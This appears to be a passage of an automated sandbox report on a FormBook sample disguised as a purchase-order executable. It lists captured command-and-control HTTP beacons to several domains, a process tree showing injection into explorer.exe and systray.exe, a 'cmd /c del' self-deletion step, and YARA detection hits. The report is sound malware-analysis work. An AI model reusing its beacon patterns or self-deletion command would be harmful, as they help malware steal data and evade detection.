                                                                                1192.168.2.54971334.102.136.18080C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Apr 8, 2021 13:33:35.454659939 CEST1294OUTGET /uabu/?_hrPK=bFc1eA65WhbOipBbmVMfd20rI4CLIGZenFDlnHAQDQVOe5/sLng8MX+h5fYtrCFe3/9q&o0D=jL0LdZHh34d0ut HTTP/1.1
                                                                                Host: www.salesenablementlaunch.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Apr 8, 2021 13:33:35.569008112 CEST1294INHTTP/1.1 403 Forbidden
                                                                                Server: openresty
                                                                                Date: Thu, 08 Apr 2021 11:33:35 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 275
                                                                                ETag: "605e06f8-113"
                                                                                Via: 1.1 google
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                2192.168.2.549716198.54.117.21880C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Apr 8, 2021 13:33:41.110529900 CEST1341OUTGET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=ruxw5m/fBZTANxn0+vJzkbJheatIWyH69nVPD3/Jlr0HuUfdGUrtHvekpNeCw/DRWxiy HTTP/1.1
                                                                                Host: www.oldschoolnews.net
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                3192.168.2.549722185.107.56.19780C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Apr 8, 2021 13:33:46.475327969 CEST2984OUTGET /uabu/?_hrPK=6Zl6RiEYODzPbdy+2wZTGBaD4iiheZyVMMytIIVZHQDK7z0ruM0YoJ4KglarveH57crY&o0D=jL0LdZHh34d0ut HTTP/1.1
                                                                                Host: www.aquaroyaume.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Apr 8, 2021 13:33:46.528913975 CEST3051INHTTP/1.1 302 Found
                                                                                cache-control: max-age=0, private, must-revalidate
                                                                                connection: close
                                                                                content-length: 11
                                                                                date: Thu, 08 Apr 2021 11:33:46 GMT
                                                                                location: http://survey-smiles.com
                                                                                server: nginx
                                                                                set-cookie: sid=47dc9904-985e-11eb-bcb9-1293ae6b7a88; path=/; domain=.aquaroyaume.com; expires=Tue, 26 Apr 2089 14:47:53 GMT; max-age=2147483647; HttpOnly
                                                                                Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                Data Ascii: Redirecting


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                4192.168.2.54972394.136.40.5180C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Apr 8, 2021 13:33:51.645071030 CEST5686OUTGET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=1HJ8hpHXj7k6l9UeC2bjkMh/CRdcIJGwkP5JhSUqrI08aFfpwfXceIsoU6U6XBnGkY13 HTTP/1.1
                                                                                Host: www.globalperfumery.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Apr 8, 2021 13:33:51.695214033 CEST5687INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 08 Apr 2021 11:31:55 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 793
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 61 6e 74 20 79 6f 75 72 20 6f 77 6e 20 77 65 62 73 69 74 65 3f 20 7c 20 31 32 33 20 52 65 67 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 2d 75 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 4f 42 4f 54 53 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 65 74 20 6f 6e 6c 69 6e 65 20 77 69 74 68 20 57 65 62 73 69 74 65 20 42 75 69 6c 64 65 72 21 20 43 72 65 61 74 65 20 61 20 66 72 65 65 20 32 2d 70 61 67 65 20 77 65 62 73 69 74 65 20 74 6f 20 67 6f 20 77 69 74 68 20 79 6f 75 72 20 6e 65 77 20 64 6f 6d 61 69 6e 2e 20 53 74 61 72 74 20 6e 6f 77 20 66 6f 72 20 66 72 65 65 2c 20 6e 6f 20 63 72 65 64 69 74 20 63 61 72 64 20 72 65 71 75 69 72 65 64 21 22 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2f 73 74 79 6c 65 73 68 65 65 74 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 31 32 33 2d 72 65 67 2d 6e 65 77 2d 64 6f 6d 61 69 6e 2e 63 6f 2e 75 6b 2f 69 66 72 61 6d 65 2e 68 74 6d 6c 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html lang="en-GB"><head><title>Want your own website? | 123 Reg</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="ROBOTS" content="NOINDEX, NOFOLLOW"><meta name="description" content="Get online with Website Builder! Create a free 2-page website to go with your new domain. Start now for free, no credit card required!"/> <meta name="viewport" content="width=device-width"><link rel="stylesheet" href="/style/stylesheet.css" type="text/css" media="all"> <link rel="icon" type="image/png" href="favicon-32x32.png" sizes="32x32"></head><body> <iframe src="https://www.123-reg-new-domain.co.uk/iframe.html" width="100%" scrolling="no"></iframe></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                5192.168.2.549724103.253.212.24980C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Apr 8, 2021 13:34:02.044403076 CEST5688OUTGET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=KguTjtt16OyzM8616W2q3NqOALXbhZ5U+Dplj7JdQYnMpaKDZTu3BtKCZayxVhVKqktu HTTP/1.1
                                                                                Host: www.kopebitest.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Apr 8, 2021 13:34:02.446372032 CEST5688INHTTP/1.1 301 Moved Permanently
                                                                                Date: Thu, 08 Apr 2021 11:34:02 GMT
                                                                                Server: Apache
                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                X-Redirect-By: WordPress
                                                                                Upgrade: h2,h2c
                                                                                Connection: Upgrade, close
                                                                                Location: http://kopebitest.com/uabu/?o0D=jL0LdZHh34d0ut&_hrPK=KguTjtt16OyzM8616W2q3NqOALXbhZ5U+Dplj7JdQYnMpaKDZTu3BtKCZayxVhVKqktu
                                                                                Vary: Accept-Encoding
                                                                                Content-Length: 0
                                                                                Content-Type: text/html; charset=UTF-8


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                6192.168.2.549728212.237.249.11680C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Apr 8, 2021 13:34:23.128309011 CEST5741OUTGET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=eLrKZiH/4/rcvGguyk8xXNlCiwRhUX1CU5PxP0qOxyscr2i7rTHvuvRLv311KV985405 HTTP/1.1
                                                                                Host: www.farmacyfastfood.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Apr 8, 2021 13:34:23.162314892 CEST5742INHTTP/1.1 404 Not Found
                                                                                Connection: close
                                                                                Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                Pragma: no-cache
                                                                                Content-Type: text/html
                                                                                Content-Length: 707
                                                                                Date: Thu, 08 Apr 2021 11:34:23 GMT
                                                                                Server: LiteSpeed
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                7192.168.2.549729160.153.136.380C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Apr 8, 2021 13:34:28.232156038 CEST5743OUTGET /uabu/?_hrPK=2Uwp0g01JmizGb12EcJoawpAPddW8uWsqbAJ1/nDEFeqLH5icC3QCg1YL+W/1Y8NxrPm&o0D=jL0LdZHh34d0ut HTTP/1.1
                                                                                Host: www.bigbuddyco.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Apr 8, 2021 13:34:28.263297081 CEST5743INHTTP/1.1 302 Found
                                                                                Connection: close
                                                                                Pragma: no-cache
                                                                                cache-control: no-cache
                                                                                Location: /uabu/?_hrPK=2Uwp0g01JmizGb12EcJoawpAPddW8uWsqbAJ1/nDEFeqLH5icC3QCg1YL+W/1Y8NxrPm&o0D=jL0LdZHh34d0ut


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                8192.168.2.549730209.99.40.22280C:\Windows\explorer.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Apr 8, 2021 13:34:34.094811916 CEST5744OUTGET /uabu/?o0D=jL0LdZHh34d0ut&_hrPK=tU/VEHnNkxFTtqdl9k3gLUVMI1i9B27PVJzZPsc0LQ26xNvAL6WXm+9T7cql/MYM9rc5 HTTP/1.1
                                                                                Host: www.agarkovsport.online
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
                                                                                Apr 8, 2021 13:34:34.314126968 CEST5745INHTTP/1.1 200 OK
                                                                                Date: Thu, 08 Apr 2021 11:34:34 GMT
                                                                                Server: Apache
                                                                                Set-Cookie: vsid=918vr3654272741917697; expires=Tue, 07-Apr-2026 11:34:34 GMT; Max-Age=157680000; path=/; domain=www.agarkovsport.online; HttpOnly
                                                                                Content-Length: 272
                                                                                Keep-Alive: timeout=5, max=125
                                                                                Connection: Keep-Alive
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 2e 20 50 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 65 72 76 69 63 65 20 70 72 6f 76 69 64 65 72 20 66 6f 72 20 6d 6f 72 65 20 64 65 74 61 69 6c 73 2e 20 20 28 31 38 29 3c 2f 68 33 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <html><head><meta name="robots" content="noarchive" /><meta name="googlebot" content="nosnippet" /></head><body><div align=center><h3>Error. Page cannot be displayed. Please contact your service provider for more details. (18)</h3></div></body></html>


                                                                                Code Manipulations

                                                                                Statistics

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Start time:13:32:31
                                                                                Start date:08/04/2021
                                                                                Path:C:\Users\user\Desktop\PO-RFQ # 097663899.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Users\user\Desktop\PO-RFQ # 097663899.exe'
                                                                                Imagebase:0xa10000
                                                                                File size:532480 bytes
                                                                                MD5 hash:3A480D8D735EFE129DCCCEA48A054721
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.253183180.0000000004122000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                General

                                                                                Start time:13:32:41
                                                                                Start date:08/04/2021
                                                                                Path:C:\Users\user\Desktop\PO-RFQ # 097663899.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\Desktop\PO-RFQ # 097663899.exe
                                                                                Imagebase:0x450000
                                                                                File size:532480 bytes
                                                                                MD5 hash:3A480D8D735EFE129DCCCEA48A054721
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.294733318.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.295102814.0000000000BB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.295070647.0000000000B80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                Reputation:low

                                                                                General

                                                                                Start time:13:32:44
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\explorer.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:
                                                                                Imagebase:0x7ff693d90000
                                                                                File size:3933184 bytes
                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:13:33:00
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\systray.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\SysWOW64\systray.exe
                                                                                Imagebase:0x10c0000
                                                                                File size:9728 bytes
                                                                                MD5 hash:1373D481BE4C8A6E5F5030D2FB0A0C68
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.494247845.0000000003310000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.493447230.00000000030D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.495271983.0000000004DB0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                Reputation:moderate

                                                                                General

                                                                                Start time:13:33:04
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:/c del 'C:\Users\user\Desktop\PO-RFQ # 097663899.exe'
                                                                                Imagebase:0x130000
                                                                                File size:232960 bytes
                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:13:33:05
                                                                                Start date:08/04/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7ecfc0000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Disassembly

                                                                                Code Analysis

                                                                                Reset < >